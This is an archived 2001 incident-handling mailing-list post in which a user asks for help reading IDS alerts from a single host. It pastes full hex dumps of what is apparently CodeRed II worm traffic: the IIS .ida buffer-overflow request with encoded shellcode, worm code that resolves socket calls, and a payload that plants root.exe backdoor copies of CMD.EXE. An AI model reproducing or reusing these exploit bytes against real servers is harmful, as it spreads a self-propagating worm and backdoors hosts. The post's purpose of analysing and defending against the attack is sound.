Hey all,
As a follow-up to what I posted before. Here's what I'm seeing
from a single host:
1. .ida attempt dlen=576 length=536 win=5360 TOS=0 TTL=124 Seq=[...]0257
Ack=[...]0956 chksum=58853 ACK
<identical packet>
2. .ida attempt dlen=564 length=479 win=6432 TOS=16 TTL=255
Seq=[...]9607 Ack=[...]9607 chksum=55438 ACK-PSH
<identical packet>
3. coderedII attempt dlen=576 length=536 win=5360 TOS=0 TTL=124
Seq=[...]0793 Ack=[...]0956 chksum=58852 ACK
<identical packet>
4. coderedII attempt dlen=413 length=373 win=7504 TOS=16 TTL=255
Seq=[...]4487 Ack=[...]3863 chksum=40789 ACK-PSH
<identical packet>
5. cmd.exe access dlen=576 length=536 win=5360 TOS=0 TTL=124
Seq=[...]1865 Ack=[...]0956 chksum=58849 ACK
<identical packet>
6. cmd.exe access dlen=981 length=941 win=10720 TOS=16 TTL=255
Seq=[...]2071 Ack=[...]4871 chksum=40339 ACK-PSH
<identical packet>
Note:
Each "series" is from the same src port
Packet #2 has same seq/ack #s
Packet #2 has a strange dlen=564 while length=479
The first packet in each attack (#1, #3, #5) is nearly
identical; even the ack #
Also note window=5360 when length=536 (10x)
TTLs go from 124->255 between the first and second packets
TOS goes from 0->16 between the first and second packets
The full traces are below. The source is in the same class A as I (cable
modem). Any ideas?
-- Brent Deterding
#(1 - 8922) [2001-08-05 19:45:38] [arachNIDS/552] WEB-IIS ISAPI .ida
attempt
IPv4: 24.217.103.179 -> 192.168.1.50
hlen=5 TOS=0 dlen=576 ID=54379 flags=0 offset=0 TTL=124
chksum=58853
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997560257
ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=59530
Payload: length = 536
000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida
010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX
020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co
1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33
1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`....
1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00
....dg.6..dg.&..
1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\...
1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@
1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=...
200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=...........
210 : C9 89 8D 54 FE FF FF 8B ...T....
------------------------------------------------------------------------
------
<identical packet to above>
------------------------------------------------------------------------
------
#(1 - 8924) [2001-08-05 19:45:38] [arachNIDS/552] WEB-IIS ISAPI .ida
attempt
IPv4: 24.217.103.179 -> 192.168.1.50
hlen=5 TOS=16 dlen=565 ID=0 flags=0 offset=0 TTL=255 chksum=55438
TCP: port=1894 -> dport: 80 flags=***AP*** seq=3243839607
ack=3243839607 off=5 res=0 win=6432 urp=0 chksum=47658
Payload: length = 479
000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida
010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX
020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0f0 : 58 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 X.090.858.bd3.80
100 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 1.090.858.bd3.80
110 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 1.090.858.bd3.80
120 : 31 00 30 39 30 00 30 39 30 00 31 39 30 00 30 63 1.090.090.190.0c
130 : 33 00 30 30 33 00 62 30 30 00 33 31 62 00 33 66 3.003.b00.31b.3f
140 : 66 00 30 37 38 00 30 30 30 00 30 3D 61 20 20 48 f.078.000.0=a H
150 : 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 TTP/1.0..Content
160 : 2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A -type: text/xml.
170 : 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 Content-length:
180 : 33 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 3379 ........`..
190 : 00 00 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26
......dg.6..dg.&
1a0 : 00 00 E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE .......h......\.
1b0 : FF FF 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 ..P.U...\...P.U.
1c0 : 8B 40 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 .@.....X....U.=.
1d0 : 04 00 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A ......=........
------------------------------------------------------------------------
------
<identical packet to above>
------------------------------------------------------------------------
------
#(1 - 8926) [2001-08-05 19:45:38] CodeRedII Overflow
IPv4: 24.217.103.179 -> 192.168.1.50
hlen=5 TOS=0 dlen=576 ID=54380 flags=0 offset=0 TTL=124
chksum=58852
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997560793
ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=19961
Payload: length = 536
000 : 75 08 81 7E 30 9A 02 00 00 0F 84 C4 00 00 00 C7 u..~0...........
010 : 46 30 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52 F0.........CodeR
020 : 65 64 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95 edII...$.U.f....
030 : 85 38 FE FF FF C7 85 50 FE FF FF 01 00 00 00 6A .8.....P.......j
040 : 00 8D 85 50 FE FF FF 50 8D 85 38 FE FF FF 50 8B ...P...P..8...P.
050 : 45 08 FF 70 08 FF 90 84 00 00 00 80 BD 38 FE FF E..p.........8..
060 : FF 01 74 68 53 FF 55 D4 FF 55 EC 01 45 84 69 BD ..thS.U..U..E.i.
070 : 54 FE FF FF 2C 01 00 00 81 C7 2C 01 00 00 E8 D2 T...,.....,.....
080 : 04 00 00 F7 D0 0F AF C7 89 46 34 8D 45 88 50 6A .........F4.E.Pj
090 : 00 FF 75 08 E8 05 00 00 00 E9 01 FF FF FF 6A 00 ..u...........j.
0a0 : 6A 00 FF 55 F0 50 FF 55 D0 4F 75 D2 E8 3B 05 00 j..U.P.U.Ou..;..
0b0 : 00 69 BD 54 FE FF FF 00 5C 26 05 81 C7 00 5C 26
.i.T....\&....\&
0c0 : 05 57 FF 55 E8 6A 00 6A 16 FF 55 8C 6A FF FF 55 .W.U.j.j..U.j..U
0d0 : E8 EB F9 8B 46 34 29 45 84 6A 64 FF 55 E8 8D 85 ....F4)E.jd.U...
0e0 : 3C FE FF FF 50 FF 55 C0 0F B7 85 3C FE FF FF 3D
<...P.U....<...=
0f0 : D2 07 00 00 73 CF 0F B7 85 3E FE FF FF 83 F8 0A
....s....>......
100 : 73 C3 66 C7 85 70 FF FF FF 02 00 66 C7 85 72 FF s.f..p.....f..r.
110 : FF FF 00 50 E8 64 04 00 00 89 9D 74 FF FF FF 6A ...P.d.....t...j
120 : 00 6A 01 6A 02 FF 55 B8 83 F8 FF 74 F2 89 45 80 .j.j..U....t..E.
130 : 6A 01 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 6A j.Th~f...u..U.Yj
140 : 10 8D 85 70 FF FF FF 50 FF 75 80 FF 55 B0 BB 01 ...p...P.u..U...
150 : 00 00 00 0B C0 74 4B 33 DB FF 55 94 3D 33 27 00 .....tK3..U.=3'.
160 : 00 75 3F C7 85 68 FF FF FF 0A 00 00 00 C7 85 6C .u?..h.........l
170 : FF FF FF 00 00 00 00 C7 85 60 FF FF FF 01 00 00 .........`......
180 : 00 8B 45 80 89 85 64 FF FF FF 8D 85 68 FF FF FF ..E...d.....h...
190 : 50 6A 00 8D 85 60 FF FF FF 50 6A 00 6A 01 FF 55 Pj...`...Pj.j..U
1a0 : A0 93 6A 00 54 68 7E 66 04 80 FF 75 80 FF 55 A4 ..j.Th~f...u..U.
1b0 : 59 83 FB 01 75 31 E8 00 00 00 00 58 2D D3 03 00 Y...u1.....X-...
1c0 : 00 6A 00 68 EA 0E 00 00 50 FF 75 80 FF 55 AC 3D .j.h....P.u..U.=
1d0 : EA 0E 00 00 75 11 6A 00 6A 01 8D 85 5C FE FF FF ....u.j.j...\...
1e0 : 50 FF 75 80 FF 55 A8 FF 75 80 FF 55 B4 E9 E7 FE P.u..U..u..U....
1f0 : FF FF BB 00 00 DF 77 81 C3 00 00 01 00 81 FB 00 ......w.........
200 : 00 00 78 75 05 BB 00 00 F0 BF 60 E8 0E 00 00 00 ..xu......`.....
210 : 8B 64 24 08 64 67 8F 06 .d$.dg..
------------------------------------------------------------------------
------
<identical packet to above>
------------------------------------------------------------------------
------
#(1 - 8928) [2001-08-05 19:45:38] CodeRedII Overflow
IPv4: 24.217.103.179 -> 192.168.1.50
hlen=5 TOS=16 dlen=413 ID=0 flags=0 offset=0 TTL=255 chksum=40789
TCP: port=1894 -> dport: 80 flags=***AP*** seq=3462074487
ack=3646623863 off=5 res=0 win=7504 urp=0 chksum=59337
Payload: length = 373
000 : CD 0F B6 C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 ......T....u..~0
010 : 9A 02 00 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 ...........F0...
020 : 00 E8 0A 00 00 00 43 6F 64 65 52 65 64 49 49 00 ......CodeRedII.
030 : 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF ..$.U.f.....8...
040 : C7 85 50 FE FF FF 01 00 00 00 6A 00 8D 85 50 FE ..P.......j...P.
050 : FF FF 50 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 ..P..8...P.E..p.
060 : FF 90 84 00 00 00 80 BD 38 FE FF FF 01 74 68 53 ........8....thS
070 : FF 55 D4 FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C .U..U..E.i.T...,
080 : 01 00 00 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 .....,..........
090 : 0F AF C7 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 ....F4.E.Pj..u..
0a0 : 05 00 00 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 .........j.j..U.
0b0 : 50 FF 55 D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE P.U.Ou..;...i.T.
0c0 : FF FF 00 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8
...\&....\&.W.U.
0d0 : 6A 00 6A 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 j.j..U.j..U....F
0e0 : 34 29 45 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50
4)E.jd.U...<...P
0f0 : FF 55 C0 0F B7 85 3C FE FF FF 3D D2 07 00 00 73
.U....<...=....s
100 : CF 0F B7 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85
....>......s.f..
110 : 70 FF FF FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 p.....f..r....P.
120 : 64 04 00 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 d.....t...j.j.j.
130 : FF 55 B8 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E .U....t..E.j.Th~
140 : 66 04 80 FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF f...u..U.Yj...p.
150 : FF FF 50 FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 ..P.u..U........
160 : 74 4B 33 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 tK3..U.=3'..u?..
170 : 68 FF FF FF 0A h....
------------------------------------------------------------------------
------
<identical packet to above>
------------------------------------------------------------------------
------
#(1 - 8930) [2001-08-05 19:45:38] WEB-IIS cmd.exe access
IPv4: 24.217.103.179 -> 192.168.1.50
hlen=5 TOS=0 dlen=576 ID=54383 flags=0 offset=0 TTL=124
chksum=58849
TCP: port=1894 -> dport: 80 flags=***A**** seq=1997561865
ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=1862
Payload: length = 536
000 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
010 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
020 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
030 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
040 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
050 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
060 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
070 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
080 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
090 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
0a0 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
0b0 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
0c0 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
0d0 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
0e0 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
0f0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
100 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
110 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
120 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
130 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
140 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF
....<.t.<.t.....
150 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
160 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
170 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
180 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
190 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
1a0 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t...
1b0 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
1c0 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
1d0 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
1e0 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
1f0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
200 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
210 : 85 5C FE FF FF 50 FF 55 .\...P.U
------------------------------------------------------------------------
------
<identical packet to above>
------------------------------------------------------------------------
------
#(1 - 8932) [2001-08-05 19:45:38] WEB-IIS cmd.exe access
IPv4: 24.217.103.179 -> 192.168.1.50
hlen=5 TOS=16 dlen=981 ID=0 flags=0 offset=0 TTL=255 chksum=40339
TCP: port=1894 -> dport: 80 flags=***AP*** seq=777982071
ack=560074871 off=5 res=0 win=10720 urp=0 chksum=22666
Payload: length = 941
000 : 00 00 00 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC ...CopyFileA..u.
010 : FF 55 F8 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 .U..E......Globa
020 : 6C 46 69 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 lFindAtomA..u..U
030 : F8 89 45 D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 ..E......GlobalA
040 : 64 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ddAtomA..u..U..E
050 : D4 E8 0C 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C ......CloseHandl
060 : 65 00 FF 75 FC FF 55 F8 89 45 D0 E8 08 00 00 00 e..u..U..E......
070 : 5F 6C 63 72 65 61 74 00 FF 75 FC FF 55 F8 89 45 _lcreat..u..U..E
080 : CC E8 08 00 00 00 5F 6C 77 72 69 74 65 00 FF 75 ......_lwrite..u
090 : FC FF 55 F8 89 45 C8 E8 08 00 00 00 5F 6C 63 6C ..U..E......_lcl
0a0 : 6F 73 65 00 FF 75 FC FF 55 F8 89 45 C4 E8 0E 00 ose..u..U..E....
0b0 : 00 00 47 65 74 53 79 73 74 65 6D 54 69 6D 65 00 ..GetSystemTime.
0c0 : FF 75 FC FF 55 F8 89 45 C0 E8 0B 00 00 00 57 53 .u..U..E......WS
0d0 : 32 5F 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 BC E8 2_32.DLL..U..E..
0e0 : 07 00 00 00 73 6F 63 6B 65 74 00 FF 75 BC FF 55 ....socket..u..U
0f0 : F8 89 45 B8 E8 0C 00 00 00 63 6C 6F 73 65 73 6F ..E......closeso
100 : 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B4 E8 0C cket..u..U..E...
110 : 00 00 00 69 6F 63 74 6C 73 6F 63 6B 65 74 00 FF ...ioctlsocket..
120 : 75 BC FF 55 F8 89 45 A4 E8 08 00 00 00 63 6F 6E u..U..E......con
130 : 6E 65 63 74 00 FF 75 BC FF 55 F8 89 45 B0 E8 07 nect..u..U..E...
140 : 00 00 00 73 65 6C 65 63 74 00 FF 75 BC FF 55 F8 ...select..u..U.
150 : 89 45 A0 E8 05 00 00 00 73 65 6E 64 00 FF 75 BC .E......send..u.
160 : FF 55 F8 89 45 AC E8 05 00 00 00 72 65 63 76 00 .U..E......recv.
170 : FF 75 BC FF 55 F8 89 45 A8 E8 0C 00 00 00 67 65 .u..U..E......ge
180 : 74 68 6F 73 74 6E 61 6D 65 00 FF 75 BC FF 55 F8 thostname..u..U.
190 : 89 45 9C E8 0E 00 00 00 67 65 74 68 6F 73 74 62 .E......gethostb
1a0 : 79 6E 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 yname..u..U..E..
1b0 : 10 00 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 ....WSAGetLastEr
1c0 : 72 6F 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 ror..u..U..E....
1d0 : 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 ..USER32.DLL..U.
1e0 : 89 45 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 .E......ExitWind
1f0 : 6F 77 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 owsEx..u..U..E..
200 : 8B 45 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 .E.i.....@.E....
210 : 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C
xV4............<
220 : 00 74 F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8
.t.<.t..........
230 : E6 FF FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 ................
240 : E8 D5 FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 ................
250 : 20 00 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF ...............
260 : 00 FF FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF ................
270 : 00 00 FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE ....Y...#...#.X.
280 : FF FF 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D .....t....t.;.
290 : 58 FE FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE X...t..h......\.
2a0 : FF FF 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 ..P.U....\......
2b0 : 00 00 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 ..\CMD.EXE.^....
2c0 : B3 63 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 .cj......d:\inet
2d0 : 70 75 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 pub\scripts\root
2e0 : 2E 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF .exe...$....\...
2f0 : 50 FF 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 P.U.j..+...d:\pr
300 : 6F 67 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C ogra~1\common~1\
310 : 73 79 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F system\MSADC\roo
320 : 74 2E 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF t.exe...$....\..
330 : FF 50 FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 .P.U.......MZP..
340 : 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 ................
350 : 00 00 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC ...@............
360 : 00 00 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 ..PE..L....*%)..
370 : 00 00 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 ................
380 : 00 00 00 08 00 00 00 00 00 00 00 10 00 00 00 10 ................
390 : 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 04 ... ....@.......
3a0 : 00 00 01 00 00 00 00 00 00 00 03 00 0A .............
------------------------------------------------------------------------
------
<identical packet to above>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 11:25:27 PDT